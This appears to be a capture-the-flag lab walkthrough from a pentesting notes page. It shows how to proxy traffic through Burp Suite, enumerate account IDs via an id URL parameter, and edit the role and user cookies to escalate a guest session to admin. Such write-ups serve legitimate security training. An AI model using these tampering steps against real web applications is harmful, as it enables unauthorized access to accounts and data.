PARAMETER MANIPULATION & COOKIE TAMPERING

#walk the application
root@htb:~$ BROWSER > {targetSite:port}
 Services
 We provide services to operate manufacturing data such as quotes, 
 customer requests etc. Please login to get access to the service.

 * no visible login page identified
#crawl the webapp and conduct directory and page enumeration - either via fuzzing or crawling
#step 1: configure the browser to intercept traffic
root@oco:~$ BROWSER > Settings
 Search: Proxy
 
root@oco:~$ BROWSER > Network Settings > Settings
 Configure Proxy Access to the Internet
  Manual Proxy Configuration: enabled
  HTTP Proxy: 127.0.0.1
  Port: 8080 {default Burp listening port}
  Also Use this Proxy for HTTPS: enabled
  
 * it is advisable to also check the option of "Also use this proxy for FTP and HTTPS" IOT have all requests go through BurpSuite
 
step 2: #disable Burp Intercept
root@oco:~$ burpsuite &
BURP > Proxy > Intercept
 Intercept is on: disabled

 * Burp's intercept is enabled by default
 
step 3: passively crawl the target site
root@oco:~$ BROWSER > {targetSite:port}

 * can also simply refresh the page if already on the target site
 
step 4: identify pertinent pages in burpsuite
BURP > Target > Site Map > ...
 http://10.129.203.93
  -> /
  -> cdn-cgi
      -> login
          -> script.js
  -> css
  -> js
  -> themes
#identification
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest

 * can also brute force the page
 * identify possible entry points on the webapp
    - Account page
       Access ID	Name	Email
       2233	guest	[email protected]
    - Uploads page; this requires admin privileges
    
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     guest  ...
 user     2233   ...

root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > Account Link
 http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 
 * guest account ID is shown...admin id can be enumerated by changing the ID value manually or through automated means
#enumeration
root@htb:~$ BROWSER > http://10.129.203.93/cdn-cgi/login/admin.php?content=accounts&id=2
 Access ID	Name	Email
 34322	admin	[email protected]

  * enumerate for the admin account by changing the id value to something else until found
     - admin info identified
     
#exploit via changing cookie value
root@htb:~$ BROWSER > {targetSite:port}/cdn-cgi/login > Login as Guest > F12 > Storage > Cookies
 name     value
 role     admin   ...
 user     34322   ...

 * reload the page to escalate privilege to admin
PreviousPLAINTEXT REFERENCESNextENCODED REFERENCES

Last updated